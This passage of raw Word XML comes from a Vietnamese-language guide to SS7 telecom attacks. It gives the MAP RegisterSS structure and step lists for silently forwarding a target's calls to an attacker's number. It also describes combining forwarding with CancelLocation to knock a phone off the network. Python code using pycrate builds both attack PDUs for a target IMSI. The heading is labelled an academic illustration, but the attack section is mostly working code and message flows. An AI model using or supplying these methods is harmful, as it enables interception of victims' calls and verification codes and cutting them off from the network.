    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.2 MAP RegisterSS Operation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MAP-RegisterSS-Arg (3GPP TS 29.002, section 7.8.1):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RegisterSS-Arg ::= SEQUENCE {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ss-Code         SS-Code,              -- 0x21 = CFU</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    basicService    BasicServiceCode OPTIONAL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    forwardedToNumber   AddressString OPTIONAL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    forwardedToSubaddress ISDN-SubaddressString OPTIONAL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    noReplyConditionTime NoReplyConditionTime OPTIONAL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chuỗi lệnh MAP để chuyển hướng cuộc gọi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 1: SRI (lấy IMSI + MSC hiện tại)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 2: UpdateLocation (đăng ký attacker MSC làm MSC của target – optional)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 3: RegisterSS với ss-Code=CFU, forwardedToNumber=attacker_number</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Message flow:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker → RegisterSS(IMSI, CFU, forward-to=+84900000000) → HLR</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">HLR → RegisterSS Response (SS-Info: CFU active)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="65"/>
    <w:bookmarkStart w:id="66" w:name="tấn-công-cfnrc-cancel-location-kết-hợp"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.3 Tấn Công CFNRc + Cancel Location (Kết Hợp)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kết hợp hai lệnh MAP để vừa vô hiệu hóa điện thoại vừa chặn cuộc gọi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 1: RegisterSS(IMSI, CFNRc, forward-to=voicemail/deadnumber)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        → Khi không liên lạc được, cuộc gọi đi thẳng voicemail</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Bước 2: CancelLocation(IMSI) → HLR gửi Detach đến UE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        → UE bị đẩy ra khỏi mạng, trở thành "not reachable"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả: KHÔNG cần jammer vật lý.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - UE: "No service" hoặc "Limited service"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - Caller: Nghe thấy voicemail hoặc "số máy không liên lạc được"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - UE sẽ tự re-attach sau vài phút → tấn công cần lặp lại</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="66"/>
    <w:bookmarkStart w:id="67" w:name="code-triển-khai-sigploit-registerss"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7.4 Code Triển Khai (SigPloit RegisterSS)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SS7 RegisterSS Attack - Call Forwarding Unconditional</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Minh họa học thuật dựa trên pycrate + SCTP M3UA</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pycrate_mobile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> TS29002_MAP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pycrate_asn1rt.asnobj_str </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> encode_msisdn_tbcd(number_str):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""Encode MSISDN sang Type-of-Address + BCD"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Xóa +, thêm TON/NPI byte</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    digits </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> number_str.lstrip(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'+'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># International: 0x91, Unknown: 0x81</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    ton_npi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x91</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> number_str.startswith(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'+'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0x81</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    bcd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">bytearray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">([ton_npi])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Pack cặp digits</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(digits):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        low </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(digits[i])</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        high </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(digits[i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(digits) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BaseNTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0xF</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        bcd.append((high </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;&lt;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low)</w:t>
      </w:r>
      <w:r>
        <w:br/>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(bcd)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> build_register_ss_cfu(target_imsi_hex, forward_to_msisdn):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    Xây dựng MAP RegisterSS argument để bật CFU</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    target_imsi_hex: IMSI dưới dạng hex BCD (vd: "24040199887766F5")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    forward_to_msisdn: Số chuyển tiếp (vd: "+84901234567")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    arg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAP.MAP_SS_Operations.RegisterSS_Arg()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># SS-Code: 0x21 = allForwardingSS, 0x21 = cfu (Call Forward Unconditional)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    arg[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'ss-Code'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">].set_val(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\x21</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Basic Service: teleservice 11 = telephony</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    arg[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'basicService'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">][</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'teleservice'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">].set_val(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\x11</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Số được chuyển tiếp đến</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    arg[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'forwardedToNumber'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">][</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'value'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">].set_val(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        encode_msisdn_tbcd(forward_to_msisdn)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arg.to_ber()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> build_cancel_location(target_imsi_hex):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""MAP CancelLocation để đẩy UE offline"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    arg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAP.MAP_MS_DataTypes.CancelLocation_Arg()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    arg[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'identity'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">][</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'imsi'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">][</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'value'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">].set_val(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.fromhex(target_imsi_hex))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    arg[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'cancellationType'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">].set_val(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'updateProcedure'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> arg.to_ber()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Ví dụ sử dụng (với SS7 transport đã thiết lập):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># registerss_pdu = build_register_ss_cfu(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#     target_imsi_hex="24040199887766F5",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#     forward_to_msisdn="+84900000000"  # Voicemail hoặc số chết</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># )</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># send_map_invoke(registerss_pdu, operation_code=10)  # opCode 10 = registerSS</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="67"/>
    <w:bookmarkStart w:id="68" w:name="phát-hiện-và-bypass"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
